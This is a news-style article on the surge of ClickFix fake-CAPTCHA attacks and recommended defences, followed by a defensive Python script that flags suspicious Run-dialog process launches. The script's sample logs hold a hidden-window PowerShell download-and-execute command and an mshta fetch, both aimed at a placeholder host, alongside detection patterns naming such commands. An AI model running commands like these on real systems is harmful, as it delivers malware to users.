A fast-growing cyber threat known as ClickFix has surged by 517% in the first half of 2025, making it the second most common attack vector after phishing and accounting for nearly 8% of all blocked attacks. The tactic relies entirely on social engineering, tricking users into running malicious commands on their own devices through fake error messages, fake CAPTCHAs, or bogus verification prompts.

According to Kaspersky, “The ClickFix technique is essentially an attempt to execute a malicious command on the victim’s computer relying solely on social engineering techniques.” Victims are typically guided through simple steps like pressing Win+R, pasting a command into the Run dialog, and hitting Enter, unknowingly launching malware.

Security experts warn that the attack’s strength lies in bypassing traditional security defenses by leveraging trusted tools like PowerShell and Windows’ own utilities. SentinelOne explained, “Tricking victims into infecting themselves in this manner has proven highly effective, with threat actors increasingly folding this technique into their playbook.”

ClickFix has been adopted by major threat groups, including Russia’s APT28, North Korea’s Kimsuky, and Iran’s MuddyWater. It has been used to distribute malware families such as Lumma Stealer, DarkGate, NetSupport RAT, and AsyncRAT. Campaigns have targeted healthcare facilities, e-commerce platforms, and even government organizations. Infections have spread globally but hit hardest in Japan, Peru, Poland, Spain, and Slovakia.

One recent operation documented by Microsoft Threat Intelligence combined blockchain-hosted payloads with ClickFix, making detection and blocking even more difficult. Meanwhile, researchers have identified commercial ClickFix builders being sold on underground forums, enabling low-skilled attackers to launch advanced campaigns.

The attack depends on human behavior more than software flaws, exploiting urgency, authority, and trust in familiar brands. Fake CAPTCHAs or error messages convince users they are solving a problem when, in fact, they are installing malware. As Kaspersky warned, “If someone seeks any manual manipulations with the system — it’s an extremely alarming sign.”

Security companies recommend training employees to recognize suspicious prompts, restricting PowerShell execution where possible, and deploying modern endpoint detection tools. Without heightened awareness, ClickFix is likely to remain one of the most dangerous malware delivery methods of 2025.
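As an added illustration of the endpoint-detection recommendation above (example code written for this page, not a tool from any vendor quoted in the article), the following Python flags the process-creation pattern a Run-dialog paste-and-run leaves behind: explorer.exe spawning a script host with hidden-window or download-and-execute arguments. The log lines are constructed samples in a flattened Sysmon-style Key=value layout; the field names, the indicator list and the placeholder URLs are assumptions.

```python
import re

# Constructed process-creation records (flattened Sysmon Event ID 1 style,
# space-separated Key=value pairs, quoted when the value contains spaces).
# These are invented sample lines, not telemetry from any real host.
SAMPLE_EVENTS = [
    'ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'CommandLine="powershell -w hidden -nop -c iex(iwr http://placeholder.invalid/run)" User=CORP\\alice',
    'ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\mshta.exe '
    'CommandLine="mshta http://placeholder.invalid/verify.hta" User=CORP\\bob',
    'ParentImage="C:\\Program Files\\Vendor\\svc.exe" Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'CommandLine="powershell -File C:\\scripts\\inventory.ps1" User="NT AUTHORITY\\SYSTEM"',
    'ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\notepad.exe '
    'CommandLine="notepad.exe C:\\Users\\alice\\notes.txt" User=CORP\\alice',
]

# A command pasted into Win+R is launched by the shell, so explorer.exe is the parent.
RUN_DIALOG_PARENTS = {"explorer.exe"}
# Script hosts and interpreters a ClickFix one-liner typically lands in.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# Argument fragments that signal "hide the window, fetch something, execute it".
SUSPICIOUS_ARGS = re.compile(
    r"(-w(?:indowstyle)?\s+hidden|-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}|\biex\b|"
    r"invoke-expression|\biwr\b|invoke-webrequest|downloadstring|https?://)",
    re.IGNORECASE,
)


def parse_event(line: str) -> dict:
    """Parse one flattened Key=value record into a dict, honouring quoted values."""
    return {k: (q if q else v) for k, q, v in re.findall(r'(\w+)=(?:"([^"]*)"|(\S+))', line)}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_clickfix_suspect(event: dict) -> bool:
    """True when the shell spawns a script host with payload-fetching arguments."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    return parent in RUN_DIALOG_PARENTS and child in SCRIPT_HOSTS \
        and bool(SUSPICIOUS_ARGS.search(event.get("CommandLine", "")))


def triage(lines):
    """Return (user, child process, command line) for every flagged record."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if is_clickfix_suspect(ev):
            hits.append((ev.get("User", "?"), basename(ev["Image"]), ev.get("CommandLine", "")))
    return hits


if __name__ == "__main__":
    for user, child, cmd in triage(SAMPLE_EVENTS):
        print(f"ALERT user={user} child={child} cmd={cmd}")
```

The third record (an admin script launched by a service) and the fourth (Notepad from the desktop) are deliberately benign so the rule's parent-plus-child-plus-arguments condition can be checked against false positives.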